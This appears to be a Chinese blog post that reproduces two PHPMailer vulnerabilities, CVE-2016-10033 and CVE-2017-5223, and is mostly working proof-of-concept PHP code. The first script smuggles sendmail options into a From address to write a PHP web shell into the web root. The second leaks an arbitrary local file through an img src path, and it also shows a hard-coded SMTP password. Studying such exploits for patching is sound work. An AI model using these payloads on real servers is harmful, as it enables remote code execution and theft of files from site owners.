1. 程式人生 > >PHPMailer命令執行及任意文件讀取漏洞

PHPMailer命令執行及任意文件讀取漏洞

custom orm cga -s tails 文件 ack exp else

  今天在thinkphp官網閑逛,無意下載了一套eduaskcms,查看了一下libs目錄中居然存在PHPMailer-5.2.13,想起了之前看到的PHPMailer的漏洞,可惜這套CMS只提供了一個郵箱接口,前臺頁面需要單獨自己寫,沒辦法用這套CMS進行復現,這邊也順便利用這個PHPMailer-5.2.13對CVE-2016-10033和CVE-2017-5223進行本地復現,記錄一下。

PHPMailer 命令執行漏洞(CVE-2016-10033)

漏洞編號:CVE-2016-10033

影響版本:PHPMailer< 5.2.18

漏洞級別: 高危

漏洞POC:

<?php /* 
PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033) 
A simple PoC (working on Sendmail MTA) 
It will inject the following parameters to sendmail command: 
Arg no. 0 == [/usr/sbin/sendmail] 
Arg no. 1 == [-t] 
Arg no. 2 == [-i] 
Arg no. 3 == [-fattacker\] 
Arg no. 4 == [-oQ/tmp/] 
Arg no. 5 == [-X/var/www/cache/phpcode.php] 
Arg no. 6 == [some"@email.com] 
which will write the transfer log (-X) into /var/www/cache/phpcode.php file. 
The resulting file will contain the payload passed in the body of the msg: 
09607 <<< --b1_cb4566aa51be9f090d9419163e492306 
09607 <<< Content-Type: text/html; charset=us-ascii 
09607 <<< 
09607 <<< <?php phpinfo(); ?> 09607 <<< 
09607 <<< 
09607 <<< 
09607 <<< --b1_cb4566aa51be9f090d9419163e492306-- 
See the full advisory URL for details. 
*/ // Attacker‘s input coming from untrusted source such as $_GET , $_POST etc. // For example from a Contact form $email_from = ‘"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php some"@email.com‘; $msg_body = "<?php phpinfo(); ?>"; // ------------------ // mail() param injection via the vulnerability in PHPMailer require_once(‘class.phpmailer.php‘);
$mail = new PHPMailer(); // defaults to using php "mail()" $mail->SetFrom($email_from, ‘Client Name‘); $address = "[email protected]"; $mail->AddAddress($address, "Some User"); $mail->Subject = "PHPMailer PoC Exploit CVE-2016-10033"; $mail->MsgHTML($msg_body); if(!$mail
->Send()) { echo "Mailer Error: " . $mail->ErrorInfo; } else { echo "Message sent!\n"; }

PHPMailer任意文件讀取漏洞分析(CVE-2017-5223)

漏洞編號: CVE-2017-5223

影響版本: PHPMailer <= 5.2.21

漏洞級別: 高危

漏洞POC:根據作者的POC改了幾行,使其適用於qq郵箱

<?php  
#Author:Yxlink

require_once(‘PHPMailerAutoload.php‘);
$mail = new PHPMailer();
$mail->isSMTP();
$mail->Host = ‘smtp.qq.com‘; 
$mail->Port = 465; 
$mail->SMTPAuth = true; 
$mail->Username = [email protected]‘;
$mail->Password = ‘zsuhxbmsaioxbcgaq‘;
$mail->SMTPSecure = ‘ssl‘;


$mail->CharSet  = "UTF-8";
$mail->Encoding = "base64";
 
$mail->Subject = "hello";
$mail->From = "[email protected]";  
$mail->FromName = "test";  
 
$address = "[email protected]";
$mail->AddAddress($address, "test");
 
$mail->AddAttachment(‘test.txt‘,‘test.txt‘); 
$mail->IsHTML(true);  
$msg="<img src=‘D:\\1.txt‘>test";
$mail->msgHTML($msg);
 
if(!$mail->Send()) {
  echo "Mailer Error: " . $mail->ErrorInfo;
} else {
  echo "Message sent!";
}
?>

 

參考文章:

PHPMailer任意文件讀取漏洞分析(CVE-2017-5223)http://www.freebuf.com/vuls/124820.html

PHPMailer 命令執行漏洞(CVE-2016-10033)分析 http://blog.csdn.net/wyvbboy/article/details/53969278

PHPMailer命令執行及任意文件讀取漏洞